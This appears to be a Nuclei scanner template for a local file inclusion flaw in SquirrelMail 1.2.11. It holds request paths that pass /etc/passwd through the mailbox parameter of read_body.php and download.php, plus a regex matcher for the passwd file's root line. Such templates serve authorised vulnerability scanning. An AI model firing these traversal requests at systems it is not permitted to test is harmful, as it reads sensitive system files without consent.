id: squirrelmail-lfi info: name: SquirrelMail 1.2.11 - Local File Inclusion author: dhiyaneshDk severity: high description: SquirrelMail 1.2.11 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/22793 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: lfi,squirrelmail,edb requests: - method: GET path: - "{{BaseURL}}/src/read_body.php?mailbox=/etc/passwd&passed_id=1&" - "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd" stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # Enhanced by mp on 2022/08/05